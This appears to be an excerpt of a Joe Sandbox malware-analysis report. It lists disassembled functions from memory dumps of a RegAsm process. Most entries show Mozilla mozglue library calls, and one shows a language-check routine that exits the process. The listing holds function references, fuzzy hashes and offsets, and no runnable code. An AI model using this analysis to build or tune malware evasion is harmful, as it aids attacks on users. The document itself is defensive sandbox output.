MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C2A2253, 6C2A2268
MOZ_CRASH(), xrefs: 6C2A227D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 6754db0662c5535cd1d88c616fed3c30205a912d4aa4a4d023fc824847fe3661
Instruction ID: 0715e5fa9c7e57061ca94344ec16eb3260a87a266aa9c2680c26571490dc6e6b
Opcode Fuzzy Hash: 6754db0662c5535cd1d88c616fed3c30205a912d4aa4a4d023fc824847fe3661
Instruction Fuzzy Hash: 5261D6B1F0021A8FCF04CAAEC989B6D77B5AF45319F154239FD68A7A95D7349C01CB81

Function 6C2F9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C2F8273), ref: 6C2F9D65
free.MOZGLUE(6C2F8273,?), ref: 6C2F9D7C
free.MOZGLUE(?,?), ref: 6C2F9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2F9E0F
free.MOZGLUE(6C2F946B,?,?), ref: 6C2F9E24
free.MOZGLUE(?,?,?), ref: 6C2F9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C2F9EC8
free.MOZGLUE(6C2F946B,?,?,?), ref: 6C2F9EDF
free.MOZGLUE(?,?,?,?), ref: 6C2F9EF5

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 2b61b74c15775d8e0d59a21328c4a16d8f08afa72aaf4dd2b0881ea60dd72aaf
Instruction ID: 4ef8cfc8fdd49263d0cd32a62b690e39a4cf0be86feb25e80baf56d25d652488
Opcode Fuzzy Hash: 2b61b74c15775d8e0d59a21328c4a16d8f08afa72aaf4dd2b0881ea60dd72aaf
Instruction Fuzzy Hash: 8171BF74A09B498BC752DF18C48059BF3F4FF99315B44861DEC5A5BB01EB31E886CB91

Function 6C2FDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C2FDDCF

Part of subcall function 6C2DFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2DFA4B

Part of subcall function 6C2F90E0: free.MOZGLUE(?,00000000,?,?,6C2FDEDB), ref: 6C2F90FF
Part of subcall function 6C2F90E0: free.MOZGLUE(?,00000000,?,?,6C2FDEDB), ref: 6C2F9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2FDE0D
free.MOZGLUE(00000000), ref: 6C2FDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2FDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2FDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2FDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C2EDEFD,?,6C2B4A68), ref: 6C2FDF32

Part of subcall function 6C2FDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2FDB86
Part of subcall function 6C2FDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2FDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C2EDEFD,?,6C2B4A68), ref: 6C2FDF65
free.MOZGLUE(?), ref: 6C2FDF80

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: d630fe5f0e5dc3b1146fb1ce4d8179cdc029fe1ae514d76a300f37807ed6cc07
Instruction ID: eb7c4375df7c99abf5daeba4ac6a4c8b5a706160fcc03c94687741df6ae7c394
Opcode Fuzzy Hash: d630fe5f0e5dc3b1146fb1ce4d8179cdc029fe1ae514d76a300f37807ed6cc07
Instruction Fuzzy Hash: A151B576A4160D9BE7119F28D8806EEF376AF95309F95011CED2A53B00DB31F81BCB92

Function 6C2FCB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCBE9
std::_Facet_Register.LIBCPMT ref: 6C2FCBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2FCC65

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 8e8886b2589343a0dd43cb6460a238d7c6103f5fe6b13967455157218966620e
Instruction ID: eab8305a900bb89f145336226bf67f66671d3044549b7b99e4fddccdf970eaba
Opcode Fuzzy Hash: 8e8886b2589343a0dd43cb6460a238d7c6103f5fe6b13967455157218966620e
Instruction Fuzzy Hash: 1041BF3474030D8FDF10EF69C898AADB7B9EF49719F044068E91A9B741DB39E806CB91

Function 6C305D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305DC9
std::_Facet_Register.LIBCPMT ref: 6C305DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C305C8C,?,6C2DE829), ref: 6C305E45

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 1bb7a7baf0b1423e23c164fe19163d55e084b1868d58d92ecb5c545ef7ca30df
Instruction ID: 0c201d6d78024ed7c45c8b68fd113d699a945cfd5efd075c8dd03f3fde5fefb5
Opcode Fuzzy Hash: 1bb7a7baf0b1423e23c164fe19163d55e084b1868d58d92ecb5c545ef7ca30df
Instruction Fuzzy Hash: 06416D357002098FDF10DF65C898AEEB7B9AF89318F14406DE90A9B791DB39E805CF65

Function 6C2DCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C2A31A7), ref: 6C2DCDDD

Strings

<jemalloc>, xrefs: 6C2DCF9F, 6C2DCFB3
: (malloc) Error in VirtualFree(), xrefs: 6C2DCFA4, 6C2DCFB8

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 7cf035eeafb6528e48a38867e55c141f7294842926863966c195c35b3ba6ab1e
Instruction ID: 54d9eb1107ff07ca82db2dca35ba3b607a9b70b3de51888e2288cf35136c762f
Opcode Fuzzy Hash: 7cf035eeafb6528e48a38867e55c141f7294842926863966c195c35b3ba6ab1e
Instruction Fuzzy Hash: 3231A770B4020F5BEF10AFA98C45BAE7779BB51B59F314019FE11EBA80DB74E4008BA1

Function 6C2ABAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C2ABC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C2ABD06

Strings

0, xrefs: 6C2ABBCD
0, xrefs: 6C2ABC74
y, xrefs: 6C2ABC4E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 4c6dbebb3141ca5e0e5ad8e26f490ad279237b7e006dbe4c1b36ec1271aaf206
Instruction ID: 81cff752c9de130b18f5c889c5c0dca3b13d499e11dfc90de4dca91c1f15caed
Opcode Fuzzy Hash: 4c6dbebb3141ca5e0e5ad8e26f490ad279237b7e006dbe4c1b36ec1271aaf206
Instruction Fuzzy Hash: C261B171A1874D9FC710CF68C491E5BB7E9AF8A348F004A2EFC8597651DB30D94ACB82

Function 6C2AECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2AF100: LoadLibraryW.KERNEL32(shell32,?,6C31D020), ref: 6C2AF122
Part of subcall function 6C2AF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C2AF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C2AED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2AEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C2AEDCC
CreateFileW.KERNEL32 ref: 6C2AEE08
free.MOZGLUE(00000000), ref: 6C2AEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C2AEE32

Part of subcall function 6C2AEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C2AEBB5
Part of subcall function 6C2AEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C2DD7F3), ref: 6C2AEBC3
Part of subcall function 6C2AEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C2DD7F3), ref: 6C2AEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C2AEDC1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 51d212e6332d2911dadf74e2d43b787e20bb8df67d23c73b30a80210cb8cede9
Instruction ID: 495939d99a9732e9bcb32e1492e516775c0c5840e5c503cbc8944be31ae7299b
Opcode Fuzzy Hash: 51d212e6332d2911dadf74e2d43b787e20bb8df67d23c73b30a80210cb8cede9
Instruction Fuzzy Hash: ED51E271D053098FDB00DFA8C9416EEB7B4AF59318F04882DEC556B740E734699ACBA2

Function 6C2B0A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6C30B80C,00000000,?,?,6C2B003B,?), ref: 6C2B0A72

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

moz_xmalloc.MOZGLUE(?,?,6C30B80C,00000000,?,?,6C2B003B,?), ref: 6C2B0AF5
free.MOZGLUE(00000000,?,?,6C30B80C,00000000,?,?,6C2B003B,?), ref: 6C2B0B9F
free.MOZGLUE(?,?,?,6C30B80C,00000000,?,?,6C2B003B,?), ref: 6C2B0BDB
free.MOZGLUE(00000000,?,?,6C30B80C,00000000,?,?,6C2B003B,?), ref: 6C2B0BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6C30B80C,00000000,?,?,6C2B003B,?), ref: 6C2B0C0A

Strings

alloc overflow, xrefs: 6C2B0C05

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 614f3a9a38b1912864ca88f844ee7491660c2bc43473e3207233f409eb387fd8
Instruction ID: 6a86e795cb04dc7c194acc852990d53b3d5a1e9b4564829705eabecbb2fbfe29
Opcode Fuzzy Hash: 614f3a9a38b1912864ca88f844ee7491660c2bc43473e3207233f409eb387fd8
Instruction Fuzzy Hash: A551B0B4A0424A8FDB25CF18C980A6EB3B9FF4438CF14496DC95AABB01EB71E545CB51

Function 6C31A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C31A565

Part of subcall function 6C31A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C31A4BE
Part of subcall function 6C31A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C31A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C31A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C31A6B6

Strings

z, xrefs: 6C31A6AE
0, xrefs: 6C31A5FB

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: cdb51ed71472ef5cfde21e167adf33bbf4808e61df5ec1dd806a89952c0fef84
Instruction ID: ebafe1dcdb1269b2d8731aad5a749dac2a8e6e1324861ded0e1a7ec151774f06
Opcode Fuzzy Hash: cdb51ed71472ef5cfde21e167adf33bbf4808e61df5ec1dd806a89952c0fef84
Instruction Fuzzy Hash: C741287190C7499FC345DF28C480A9BBBE5BF89354F409A2EF89987650EB30E549CF92

Function 6C2A78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C32008B), ref: 6C2A7B89
free.MOZGLUE(?,6C32008B), ref: 6C2A7BAC

Part of subcall function 6C2A78C0: free.MOZGLUE(?,6C32008B), ref: 6C2A7BCF

free.MOZGLUE(?,6C32008B), ref: 6C2A7BF2

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 81ab8202c1ddb79c7cc634bc5e1477cfd4940f04d126f8bdf2ffef1dc949597b
Instruction ID: 13a9ca88355ad41de3161193b17b72ea6f4ca5c80579e365ddf02815d10b50f9
Opcode Fuzzy Hash: 81ab8202c1ddb79c7cc634bc5e1477cfd4940f04d126f8bdf2ffef1dc949597b
Instruction Fuzzy Hash: 11C1F571E0112C8BEB24CBA8CC90B9DB772AF41714F1407A9D91AE7BC5C7319E868F49

Function 6C2E9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
__Init_thread_footer.LIBCMT ref: 6C2E949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C2E9459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C2E946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C2E947D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 3c4f71a0455b3b64a41ce9a74dd11fa85f98011184e16b9d81f47fa69836ce33
Instruction ID: 4287dbe60b4831eb161718882ea3d81595a1aa5a70e640c97971a7e9cb82feee
Opcode Fuzzy Hash: 3c4f71a0455b3b64a41ce9a74dd11fa85f98011184e16b9d81f47fa69836ce33
Instruction Fuzzy Hash: 83014C30A001168BEF00AB6CD911EC933BCAB4D32DF04453BED0696B41F6BDE8658D5B

Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
ExitProcess.KERNEL32 ref: 004167A5
ExitProcess.KERNEL32 ref: 004167AF
ExitProcess.KERNEL32 ref: 004167B9
ExitProcess.KERNEL32 ref: 004167C3
ExitProcess.KERNEL32 ref: 004167CD

Strings

B, xrefs: 00416780, 0041678C

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

